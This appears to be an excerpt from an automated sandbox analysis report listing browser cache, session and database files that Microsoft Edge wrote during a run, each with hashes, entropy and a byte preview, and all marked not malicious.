                                                                                                                                                                  Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):189657
                                                                                                                                                                  Entropy (8bit):6.422357706931333
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:JcR8kFfhhOr2u1GC6IBgBFL/C9MCEV3Mjl7DnxNQfBm:JcZpuIcgXL/4EV3Mjlnc0
                                                                                                                                                                  MD5:201AF2C738CDA14C553D0F3FC66B84EC
                                                                                                                                                                  SHA1:473178336091B1A457EFB07EEE39029744D86255
                                                                                                                                                                  SHA-256:27A69E9AC719AF1F48BE8480D93E747436EDCD029A1927DC1E42A264E877C9AE
                                                                                                                                                                  SHA-512:26BB6754188679C3B382A8C0A7E8361670EDB4EA8F89A041EF2A30C9C6ED33E520CDAF3C7C89FBC59BC7264E2136C7BC1266511DBF1BBFDA0C5A78394B2C4E33
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:0\r..m..........rSG.....0....Pfg......?.Y....n:,.......-..$S.8..`,.....L`.....$S...`......L`......Qc.n....exports...QcR......module....Qc.W'Z....define....QbzC.#....amd....D..H.............".. ...".. ...!...`..2....\".. ...!...-.....!...z..b.....=`...7u............).........".. ...!........./..4.....).......$Rb............I`....Da......... ..f..........`...p...0...j......@........P.......{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........D`....D`....D`.....E..%.`............$S.,.`......L`.....$S..`R....DL`.....DRb..............Qb...A....e.....Qb........t.....Qb..#....s.....Qbj......n...c................I`....Da.....b...$S.`.`z.....L`........

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):24
                                                                                                                                                                  Entropy (8bit):2.1431558784658327
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:m+l:m
                                                                                                                                                                  MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                  SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                  SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                  SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:0\r..m..................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                  Entropy (8bit):3.5931902015385067
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:T9m0XTXl/l7n/lxEkTuM9n:g0XjEL+
                                                                                                                                                                  MD5:1DACA1B13AA5AB79ADF2551D3A87B567
                                                                                                                                                                  SHA1:651BD98A8215DF3FA5912D9871BBFF1AE152E0F7
                                                                                                                                                                  SHA-256:6185413C5B5FBEE668CD4714D435CAE48200F916C6E66A8E007A59559351391B
                                                                                                                                                                  SHA-512:92E9E08ECBAFBEB62C5208EF52919228BEAC60D4F9BCB308F0B5DAC07582F96D6C3488F0FB9549AAA0EB2474A98EB6968195FA17AE19010BF67062B6D8F7116D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:@......oy retne.........................X....,.................)..../.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):5642
                                                                                                                                                                  Entropy (8bit):3.4012480039262005
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:y89JQ81mV9PLFVPfyaG9Xp+N+VibokEMLl9iSrl11b6d4NCX7:yd8oV9PLFVPfo9Xp+NKibDtLl9iSrl+z
                                                                                                                                                                  MD5:216B50F06641BFB2BA2A8F401DE8E021
                                                                                                                                                                  SHA1:A9882B8C5CC667CF2862F66881A03BC04E49FEDB
                                                                                                                                                                  SHA-256:2553C50EE0B0B04BEE39AD821D378952ED0D0BCC11E9361636C3EA2F788FE766
                                                                                                                                                                  SHA-512:5DEA1B21283E110F08DB468F7493A123170542BB89E35FCE459389DB7DEE9A436F812E137DD381B715369F5D76326CF0080D2A7CF30FBFB2963F55CF2D7BB35E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f...............3.*.b................next-map-id.1.Cnamespace-cbc32016_3490_484f_aaaa_b9204284676b-https://ntp.msn.com/.0..j..................map-0-shd_sweeper.){.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.c.,.a.d.s.-.c.f.v.4.,.1.s.-.p.n.p.f.e.d.l.o.c.c.f.,.p.n.p.w.x.e.x.p.i.r.e.3.6.0.,.b.i.n.g._.v.2._.s.c.o.p.e.,.p.r.g.-.1.s.w.-.s.a.c.f.x.2.t.c.,.p.r.g.-.1.s.w.-.s.a.-.c.a.p.c.o.n.f.3.t.4.,.p.r.g.-.1.s.w.-.s.a.-.s.p.7.-.t.c.c.,.p.r.g.-.1.s.w.-.r.p.d.l.a.u.n.c.h.-.5.,.p.r.g.-.f.i.n.-.c.l.e.f.t.r.a.,.r.o.u.t.e.f.i.n.a.n.c.e.p.r.o.d.,.r.o.u.t.e.r.g.r.a.p.h.p.r.o.d.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.1.s.w.-.h.e.a.d.e.r.-.e.v.e.n.t.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.f.-.r.e.l.-.a.l.l.,.1.s.-.f.c.r.y.p.t.,.1.s.-.n.t.f.1.-.p.a.c.e.r.s.c.a.l.e.1.,.1.s.-.n.t.f.1.-.p.a.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):333
                                                                                                                                                                  Entropy (8bit):5.1575106232725325
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iOnXHBJYDhP5c23oH+TcwtrQM72KLl1dq2TYDhP5c23oH+TcwtrQMxIFUv:7nXIPhYeb/LrdvsPhYebCFUv
                                                                                                                                                                  MD5:E07459E68823F31E0955EECD5A5C93E5
                                                                                                                                                                  SHA1:67606433090C8D4749078A47FE0DA92B4A1BC3BC
                                                                                                                                                                  SHA-256:0E812207569AA1B4DC21BD9B34F71AE6D83D650645F5FDB37C14E71D26469DD7
                                                                                                                                                                  SHA-512:A42C467A63E833358054BEE8CEBE9B0C2C9E1C8DF91C415AC25CADA0B20C07B6DD32B56859BFBEA2B10BEBC0B7B3A4B7F551D9C738D7CADC30C2C49340F298DC
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/11-01:54:27.819 1e80 Creating DB C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage since it was missing..2025/01/11-01:54:27.876 1e80 Reusing MANIFEST C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13381052068843973

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1489
                                                                                                                                                                  Entropy (8bit):3.538360749642399
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:3i6m9PihYljljlbpsAFc0Lp3k2amEtLqlh4PDe9KhpWl4CQUSkOAdcxldlZ:3i6XIZZbzFzLpVFERucDe9MWlWqORnZ
                                                                                                                                                                  MD5:E174D25CF24632650C443B387EAE4A8B
                                                                                                                                                                  SHA1:7A97B781E6FB8977CCD941DD6071F93419BBC780
                                                                                                                                                                  SHA-256:851053EB5B25F1D1828FF98C3012562F2B015EDC846B25838AF98101B4D8FC7A
                                                                                                                                                                  SHA-512:DEA7A61D6EC354799B8112ECD7850D80C8AD3377EFA4EBD806E57A6223EFA0601E544FCEB510A73F861ABFAF9BDB890D7510BE157A35EE2DEAA6F73C35F3CA4A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SNSS................................"........9.#4.......$...8a8a31c1-9812-4e9d-a3d6-712670677b0a........................................................!.............................................1..,.......$...cbc32016_3490_484f_aaaa_b9204284676b.......................`[{.............................................................................................................................edge://newtab/......N.e.w. .t.a.b...........................................................x...............p...............x...............p.......7..h+..8..h+......................................................................x...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.U.S.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.&.O.C.I.D.=.M.N.H.P._.U.5.3.1.&.f.i.r.s.t.l.a.u.n.c.h.=.1.................................8.......0.......8....................................................................... ...

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.4418480883730883
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLiN/cUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLiBVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                  MD5:444C697E8AF5C7ABF6A576C698CCDAE6
                                                                                                                                                                  SHA1:7E6455ED6A534CCBDE446B25CB8A387E40A74BBA
                                                                                                                                                                  SHA-256:7401AE966CB49B237B8F07B23585BC3D1961C0F5762A43E2796776F870E09297
                                                                                                                                                                  SHA-512:B2E03753CE8D60980984769A7778F8F93B9E2B84B9A7FFD0F04759159F69C98FC1AED0EAECF9CF044B9BE2D3490C61CECE7E618F91B1398BCCA809AE7D9BF32C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................S`.........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                  Entropy (8bit):3.473726825238924
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:41tt0diERGn:et084G
                                                                                                                                                                  MD5:148079685E25097536785F4536AF014B
                                                                                                                                                                  SHA1:C5FF5B1B69487A9DD4D244D11BBAFA91708C1A41
                                                                                                                                                                  SHA-256:F096BC366A931FBA656BDCD77B24AF15A5F29FC53281A727C79F82C608ECFAB8
                                                                                                                                                                  SHA-512:C2556034EA51ABFBC172EB62FF11F5AC45C317F84F39D4B9E3DDBD0190DA6EF7FA03FE63631B97AB806430442974A07F8E81B5F7DC52D9F2FCDC669ADCA8D91F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.On.!................database_metadata.1

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):361
                                                                                                                                                                  Entropy (8bit):5.149183857808905
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iOndE4MJYDhP5c23oH+Tcwt7Uh2gr52KLl1Q4q2TYDhP5c23oH+Tcwt7Uh2ghZIg:7n64rPhYebIhHJLrQ4vsPhYebIhHh2F2
                                                                                                                                                                  MD5:C09D5DD0B70E22A628488E321689E813
                                                                                                                                                                  SHA1:DA34038875BA783C739753D9245D73B8DE2CAE00
                                                                                                                                                                  SHA-256:49D0A44375E838E4233DD6FB3D6AEE438346FECD38BA9E8EEDB28B08F2E88642
                                                                                                                                                                  SHA-512:56EE9CB1FB7A9F9F3B420BE8E498265BDD20FE9A13CCFC4FBB4AAAF26CFC428EE63E0907B876FF6AB65E3E43F16AE7CFDBFD11ABB32A49263AA10D1D6D184877
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/11-01:54:25.547 1464 Creating DB C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database since it was missing..2025/01/11-01:54:25.891 1464 Reusing MANIFEST C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):24
                                                                                                                                                                  Entropy (8bit):2.1431558784658327
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:m+l:m
                                                                                                                                                                  MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                  SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                  SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                  SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:0\r..m..................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\temp-index

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):48
                                                                                                                                                                  Entropy (8bit):2.9972243200613975
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:8rvzN00Ee5xn:8rrNgIx
                                                                                                                                                                  MD5:8406B7FFFC864C0D17394F53008327F6
                                                                                                                                                                  SHA1:77A5D8CCE98B5D291910FFD501991255057587C7
                                                                                                                                                                  SHA-256:BE2B1D5971A028A207CFB52E7F520DE865822693621EF30BF0D1C2FC089A1FC0
                                                                                                                                                                  SHA-512:5C4E3FA920432EC12C2488A51B53319A448B8ED9056370990EDCF96284DA67E535163FBBBF5B81E0E46E35FF77E127E1B5A189ECDC486A753E65EE60567A4B54
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:(...a.Voy retne..........................E.../.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):24
                                                                                                                                                                  Entropy (8bit):2.1431558784658327
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:m+l:m
                                                                                                                                                                  MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                  SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                  SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                  SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:0\r..m..................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\temp-index

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):48
                                                                                                                                                                  Entropy (8bit):2.9972243200613975
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:8rvzN00Ee5xn:8rrNgIx
                                                                                                                                                                  MD5:8406B7FFFC864C0D17394F53008327F6
                                                                                                                                                                  SHA1:77A5D8CCE98B5D291910FFD501991255057587C7
                                                                                                                                                                  SHA-256:BE2B1D5971A028A207CFB52E7F520DE865822693621EF30BF0D1C2FC089A1FC0
                                                                                                                                                                  SHA-512:5C4E3FA920432EC12C2488A51B53319A448B8ED9056370990EDCF96284DA67E535163FBBBF5B81E0E46E35FF77E127E1B5A189ECDC486A753E65EE60567A4B54
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:(...a.Voy retne..........................E.../.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_0

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_2

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_3

                                                                                                                                                                  Download File
